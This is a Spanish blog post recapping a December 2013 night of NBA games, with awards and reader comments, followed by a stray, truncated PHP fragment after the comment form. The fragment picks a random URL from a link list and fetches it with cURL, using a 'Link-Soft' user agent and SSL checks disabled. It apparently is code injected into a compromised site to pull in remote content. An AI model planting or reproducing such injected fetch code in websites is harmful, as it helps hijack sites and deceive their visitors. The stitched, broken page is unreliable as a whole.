La Crónica: Se aprieta la liga

19 de December de 2013 por Simon

Habitualmente nos quejamos de la ingente cantidad de partidos que hay los miércoles en la NBA. Hay tantos que no da tiempo a asimilar todas las cosas que ocurren en una sola noche en la mejor liga del mundo. La jornada de ayer es un claro ejemplo: 13 partidos, la mayoría de ellos muy interesantes al enfrentarse equipos que luchan por el mismo objetivo. Los 13 partidos nos dejaron un buen puñado de segundos finales decisivos, actuaciones espectaculares, broncas y además, de postre, el retorno de varios jugadores importantes como Tyson Chandler, Anthony Davis o Nene Hilario. Después de toda esta avalancha de acontecimientos, nos quedamos con una sola cosa: después de esta jornada, la liga está más igualada que nunca. Comenzamos.

La jornada comenzaba con el gran duelo, ese que todo el mundo está deseando ver y que ya trasciende lo que es un simple partido: La vista de los Pacers el American Airlines Arena de Miami. Los Heat tenían la posibilidad de reducir diferencias con el líder de la conferencia y no la desaprovecharon, se llevaron un partido en el que Indiana había mandado desde el principio. Los problemas de faltas de Roy Hibbert, clave en los enfrentamientos entre ambos equipos, y un parcial de 10-0 en el último cuarto pusieron la victoria en las manos de los campeones que se colocan a un solo partido de Indiana lo que deja la batalla por el Este está más abierta que nunca (94-97). La anécdota de la noche la dejaron Lebron James y Mario Chalmers que se encararon en el banquillo y tuvieron que ser separados pero parece que quedó en eso, una anécdota. El único otro equipo en registros positivos de la conferencia Este, los Atlanta Hawks, también entró en acción anoche y venció en casa gracias a un gran último cuarto en el que desarbolaron a unos Kings incapaces de contener todo su caudal ofensivo (107-124). 

En el Oeste el partido más atractivo era la visita de Portland Trail Blazers a Minnesota. Esperábamos un gran partido y un espectacular duelo entre Aldridge y Love pero a la hora de la verdad los Blazers llegaron exhaustos tras la gira por el Este y no fueron rival para los Wolves en ningún momento. Al descanso Minnesota vencía ya de 26 puntos por lo que en la segunda parte Portland apenas pudo maquillar el marcador esperando a que llegaran noches mejores (109-120). La derrota de Blazers permitía a los Spurs acercarse en la clasificación y los de Popovich no quisieron desaprovechar la oportunidad y vencieron en una cancha complicada como es la de los Phoenix Suns a pesar de la importantísima baja de Tony Parker. Manu Ginobili tomó el mando de las operaciones y con 9 puntos en los últimos 3 minutos dio la victoria a San Antonio (108-101). Ya es curioso que, con los resultados que se dieron anoche, el equipo más beneficiado fuera uno que no jugó, los Oklahoma City Thunder, que se colocan como líderes.

Un poco más atrás que el trío cabecero del Oeste, se encuentran Los Angeles Clippers  que ayer no tuvieron ningún problema para vencer a los Pelicans a pesar del retorno a la acción de Anthony Davis. Su vuelta no causó ningún impacto en la pareja interior de Clippers que lejos de amilanarse, dominó el partido y dio a su equipo una victoria cómoda (95-108). Tampoco perdieron comba los Houston Rockets que encontraron en Chicago Bulls el rival perfecto para lamer sus heridas después de la inesperada derrota en Sacramento días atrás. Los Bulls, que fueron siempre a remolque, entregaron la cuchara mediado el tercer cuarto y Houston tuvo un apacible final de partido (94-109). En otro duelo entre equipos del Oeste, Dallas Mavericks se impuso a Memphis Grizzlies con una gran primera parte que les hizo vivir tranquilos durante la segunda pues los visitantes, sin Mike Conley ni Marc Gasol, apenas inquietaron a los de Carlisle (91-105).

En el Este la jornada presentaba varios partidos entre equipos candidatos a colarse en Play Off lo que nos dejó partidos igualadísimos como la visita de Charlotte a Toronto que se terminó decidiendo después de una prórroga con una canasta sobre la bocina de Kemba Walker (104-102). Otros que nos dejaron un choque emocionante e igualadísimo fueron los Pistons en el Garden. El partido en un principio apuntaba a paliza histórica de los Celtics pues en el primer cuarto ganaban de 19 puntos pero Detroit consiguió ir limando poco a poco las diferencias para igualar el partido a mitad del tercer cuarto. Cuando parecía que el encuentro se iba a decantar del lado de los Pistons, que llegó a tener ventajas de 7 puntos a falta de 3 minutos, un último arreón de los Celtics volvió a apretar el partido pero Jeff Green falló en la última jugada una entrada a canasta muy forzada y la victoria de la llevaron definitivamente los visitantes (107-106). Por su parte, los Brooklyn Nets perdieron la oportunidad de colarse en Playoffs por primera vez esta temporada tras perder en un igualado duelo ante los Washington Wizards. Los locales gestionaron muy mal el último minuto de partido en el que Washington logró la ventaja necesaria para ganar (113-107).

En el resto de partidos de la jornada, New York Knicks precisó de dos prórrogas para vencer a Milwaukee Bucks (107-101) con Melo jugando 55 minutos y Utah Jazz venció en Orlando con un gran partido de Trey Burke (86-82).

PREMIOS

MVP: 29 puntos, 15 rebotes y 9 asistencias, números al alcance de Kevin Love y un puñado de jugadores más. El de los Wolves lideró a su equipo a la victoria frente los líderes de la liga.

Rookie: ¡Vaya partidazo se marcó Trey Burke! El de los Jazz se fue a los 30 puntos (el máximo anotado por un rookie esta temporada) pero es que además cogió 7 rebotes y repartió 8 asistencias.

Sorpresa: Mientras Raymond Felton siga lesionado, Beno Udrih seguirá contando con minutos y esperad a ver qué pasa cuando vuelva porque el esloveno está aprovechando muy bien el tiempo. Anoche acabón con 21 puntos (5 de 7 en triples), 4 rebotes, 5 asistencias y 2 robos. Otro base, Brandon Knight, explotó hasta llegar a los 36 puntos.

Decepción: Terrible partido de Victor Oladipo (1 de 12 en TC) que además coincidió con la súper actuación de Trey Burke. Las comparaciones resultaron odiosas.

Esfuerzo en vano: Esta vez los 36 puntos, 6 rebotes, 6 asistencias y 3 robos de Damian Lillard no significaron la victoria de los Blazers. El cansancio les pasó factura. Tyreke Evans consiguió un triple doble de 11 puntos, 13 rebotes y 10 asistencias pero los Pelicans cayeron ante los Clippers.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Si que están mal los Knicks -es la enésima prueba- si necesitan de dos prórrogas para cargarse a Milwaukee…no me esperaba el descalabro de los Bucks por otra parte,vale que no tienen ninguna estrella pero formaron un equipo de jugadores de 6-7 (nota) y ya no se sabe si es provocado o qué,porque tampoco parecen los más activos en el mercado.Si a esto le sumamos el runrun de Seatlle por detrás mientras el propietario del equipo busca inversores para construir un nuevo pabellón…vaya panorama

      Citar

  2. txusma dice:
    #2

    Pues ojo que los Knicks ya jugaron con Chandler. Si con él las cosas siguen igual de mal habrá que empezar a plantearse medidas drásticas.

      Citar

  3. GreenPride dice:
    #3

    De anoche por supuesto vi el gran Heat-Pacers. Los Pacers dominaron prácticamente todo el partido a base de gran defensa y de los enormes partidos de David West y Paul George y a pesar de un partido lamentable de Hibbert que esta vez no tuvo ningún peso debido a las personales que le mantuvieron fuera del choque. A pesar de ello, con gran defensa, oficio y dureza los Pacers fueron siempre arriba aguantando los arreones de los Heat que sobrevivían gracias a LeBron y sobre todo a un fenomenal (esta vez sí) Flash Wade. Así con LeBron atacando la zona en ausencia de Hibbert y los Pacers aguantando (por momentos se llegó a ver a King James desesperarse) se llegó al último cuarto donde un último arreón de los Heat pudo esta vez sí voltear el marcador. A los Pacers les faltó algo de temple, un mejor ataque en los minutos finales y sobre todo no permitir tres o cuatro canastas en transición que dieron la vuelta al marcador pero demostraron que están al nivel de los Heat y que van a ser un rival durísimo en el Este para los campeones. Vista la igualdad entre los dos, la ventaja campo se antoja un factor importante si como todo parece indicar se acaban encontrando en las Finales del Este.
    Y en el Oeste todo se presenta para una lucha con muchos gallos dispuestos a mandar. Aún así yo a día de hoy veo muy fuertes a los Thunder con un banquillo mejoradísimo con la inclusión de Lamb, Adams y Jackson como parte importante del equipo. De todas maneras ahí si esperan emociones fuertes desde el inicio de los PO con equipos en gran forma como Rockets, Blazers e incluso Clippers. Veremos como evoluciona la conferencia pero promete espectáculo del bueno…

      Citar

  4. Simon dice:
    #4

    Kobe Bryant 6 semanas de baja por una rotura en la tibia o eso he entendido con mi ingles… jarro de agua fria cuanto menos. Mala suerte para el y los Lakers

      Citar

  5. Esteban dice:
    #5

    Simon:
    Kobe Bryant 6 semanas de baja por una rotura en la tibia o eso he entendido con mi ingles… jarro de agua fria cuanto menos. Mala suerte para el y los Lakers

    jajaja alguien puede explicarme por los lakers sin ver jugar a un tio de 35 años y una lesion que le llevo 8 meses de recuperacion, le firman el contrato mas caro de toda la nba?

    esta lesion no es solo logica, sino hasta esperable, y mal que nos pese, kobe esta mas cerca del retiro que de seguir jugando, su juego o estilo de juego no es compatible con su edad y su nuevo fisico

    o empieza a jugar mas parado o a tirar a pie firme tipo pierce o allen, o ya no sera productivo

      Citar

  6. Simon dice:
    #6

    Que grandes los Spurs ganando en el Oracle a Warriors sin Duncan, ni Parker ni GInobili, con un Belinelli excelso y la pareja Splitter-Diaw jugando muy bien volviendo locos a la defensa de Golden State. Espectacular lo de este equipo.

      Citar

  7. Simon dice:
    #7

    Por cierto, se me ha olvidado comentarlo… pero se repite la historia del año pasado y Spurs sale con los “suplentes” un día en el que el partido era retransmitido por TNT a nivel nacional… habrá represalias sanciones este año también? o lo dejaran pasar al ser un partido menos trascendente que el año pasado ante Miami??

      Citar

  8. Jose Luis dice:
    #8

    Los que dan vergüenza son los Warriors, al final no entrarán en PO si siguen así…

      Citar

  9. Ruxixón dice:
    #9

    Jose Luis:
    Los que dan vergüenza son los Warriors, al final no entrarán en PO si siguen así…

    Rookie de draft y traspaso por LeBron y el año que viene será otra cosa….jajaj.No,la verdad es que el bajón es muy fuerte,tienen que aprovechar estos partidos en casa para volver a coger buenas sensaciones porque no es admisible que con el equipo que tiene estén fuera de PO,parece que han perdido las ganas de competir o que no hay tanta química.Es raro la verdad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>